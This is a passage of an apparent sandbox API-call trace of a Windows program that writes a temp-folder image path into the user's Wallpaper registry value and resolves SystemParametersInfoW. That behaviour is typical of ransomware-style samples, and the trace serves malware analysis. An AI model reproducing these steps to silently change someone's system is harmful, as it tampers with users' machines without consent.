wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.825] Sleep (dwMilliseconds=0xa) [0249.840] timeGetTime () returned 0x117e556 [0249.841] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.841] Sleep (dwMilliseconds=0xa) [0249.856] timeGetTime () returned 0x117e565 [0249.856] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.856] Sleep (dwMilliseconds=0xa) [0249.873] timeGetTime () returned 0x117e575 [0249.873] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0249.873] Sleep (dwMilliseconds=0xa) [0249.901] timeGetTime () returned 0x117e584 [0249.901] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.901] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0249.901] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0249.902] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0249.903] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0249.906] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0249.906] RegCloseKey (hKey=0x3c0) returned 0x0 [0249.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73370 | out: hHeap=0x2af0000) returned 1 [0249.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0249.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0249.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0249.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0249.907] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0249.907] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0249.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0249.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0249.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0249.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0249.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0249.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0249.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6e0 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0249.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0249.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab638 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0249.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0249.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0249.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0249.910] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0249.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0249.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0249.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0249.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0249.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0249.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0249.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0249.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0249.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0249.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0249.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0249.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0249.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0249.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0249.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0249.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0249.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0249.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0249.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0249.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0249.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0249.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0249.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0249.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0249.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0249.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0249.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0249.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0249.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0249.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0249.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0249.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0249.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0249.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0249.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0249.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0249.915] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0249.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0249.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0249.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0249.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6f20 [0249.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6f20, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 